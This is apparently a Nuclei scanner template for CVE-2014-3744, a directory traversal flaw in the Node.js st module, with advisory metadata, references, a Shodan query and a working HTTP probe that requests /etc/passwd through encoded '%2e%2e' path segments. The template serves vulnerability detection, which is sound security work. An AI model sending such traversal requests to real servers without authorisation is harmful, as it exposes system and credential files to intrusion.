id: CVE-2014-3744 info: name: Node.js st module Directory Traversal author: geeknik severity: high description: A directory traversal vulnerability in the st module before 0.2.5 for Node.js allows remote attackers to read arbitrary files via a %2e%2e (encoded dot dot) in an unspecified path. impact: | An attacker can read sensitive files on the server, potentially leading to unauthorized access or exposure of sensitive information. remediation: | Upgrade to a patched version of the st module or use an alternative module that is not vulnerable to directory traversal. reference: - https://nvd.nist.gov/vuln/detail/CVE-2014-3744 - https://github.com/advisories/GHSA-69rr-wvh9-6c4q - https://snyk.io/vuln/npm:st:20140206 - https://nodesecurity.io/advisories/st_directory_traversal - http://www.openwall.com/lists/oss-security/2014/05/13/1 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2014-3744 cwe-id: CWE-22 epss-score: 0.00672 epss-percentile: 0.79778 cpe: cpe:2.3:a:nodejs:node.js:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: nodejs product: node.js shodan-query: cpe:"cpe:2.3:a:nodejs:node.js" tags: cve2014,cve,lfi,nodejs,st http: - method: GET path: - "{{BaseURL}}/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd" matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" - type: status status: - 200 # digest: 490a0046304402205aac669d4a5a54dc948c50fd092acac57e7866b919782b44ac4830002791e4c20220754b3c310957be2dcb62fcf22f2dae9be958dd7d837d96fdaae4bab0f1ac0b72:922c64590222798bb761d5b6d8e72950